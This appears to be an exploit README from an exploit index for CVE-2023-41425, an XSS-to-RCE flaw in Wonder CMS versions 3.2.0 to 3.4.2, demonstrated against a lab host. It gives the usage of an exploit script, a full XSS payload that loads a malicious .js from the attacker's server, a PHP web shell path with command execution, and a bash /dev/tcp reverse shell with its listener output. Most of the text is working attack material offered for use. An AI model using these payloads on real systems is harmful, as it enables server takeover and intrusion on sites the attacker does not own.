Share
## https://sploitus.com/exploit?id=65AB8A87-83D4-5506-8695-78C3B2D45141
# CVE-2023-41425

CVE-2023-41425 is a reflected XSS vulnerability in Wonder CMS which further allows to execute arbitrary code through a malicious script via the `installModule` component.

# Usage

Running the exploit against the target's `loginURL`, specifying our IP and port for the web server hosting the malicious `.js` file:

```console
$ python3 exploit.py --url http://sea.htb/loginURL --xip 10.10.16.25 --xport 8888
[+] Creating PHP Web Shell
[+] Writing malicious.js
[+] XSS Payload:
http://sea.htb/index.php?page=loginURL?"></form><script+src="http://10.10.16.25:8888/malicious.js"></script><form+action="
[+] Web Shell can be accessed once .zip file has been requested:
http://sea.htb/themes/malicious/malicious.php?cmd=<COMMAND>
[+] To get a reverse shell connection run the following:
[+] curl -s 'http://sea.htb/themes/malicious/malicious.php' --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'" 
[+] Starting HTTP server
Serving HTTP on 10.10.16.25 port 8888 (http://10.10.16.25:8888/) ...
<--REDACTED-->  "GET /malicious.js HTTP/1.1" 200 -
<--REDACTED-->  "GET /malicious.zip HTTP/1.1" 200 -
<--REDACTED-->  "GET /malicious.zip HTTP/1.1" 200 -
<--REDACTED-->  "GET /malicious.zip HTTP/1.1" 200 -
<--REDACTED-->  "GET /malicious.zip HTTP/1.1" 200 -
```

Send the XSS payload to the victim. Once victim opens the link the `.js` will be requested by them from the web server started above. The `.js` will then download the malicious `.zip` module containing a simple PHP web shell.

Once the `.zip` has been requested, it should have been installed through `installModule` and can be accessed via the link provided by the script.

## Running commands

```console
$ curl -s 'http://sea.htb/themes/malicious/malicious.php?cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

## Reverse Shell

Setup the listener first, then run any command to establish a reverse shell connection. The script provides one example to do so (Linux).

```console
$ curl -s 'http://sea.htb/themes/malicious/malicious.php' --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/10.10.16.25/7777 0>&1'"
```

And get connection on listener:

```console
$ rlwrap -cAr nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.16.25] from (UNKNOWN) [10.129.194.205] 54398
bash: cannot set terminal process group (1135): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sea:/var/www/sea/themes/malicious$
```

# Installation

Install the requirements:

```
pip install -r requirements.txt
```

Help: 

```console
$ python3 exploit.py --help

usage: exploit.py [-h] --url URL --xip XIP --xport XPORT

Exploit Wonder CMS v3.2.0 - v3.4.2 XSS to RCE (CVE-2023-41425)
Initial CVE and proof-of-concept by prodigiousMind
Rewritten by xpltive

options:
  -h, --help     show this help message and exit
  --url URL      Target URL of loginURL (Example: http://sea.htb/loginURL)
  --xip XIP      IP for HTTP web server that hosts the malicious .js file
  --xport XPORT  Port for HTTP web server that hosts the malicious .js file
```

# Credits
Credits to `prodigiousMind` for discovering and reporting the vulnerability ([Link](https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413)).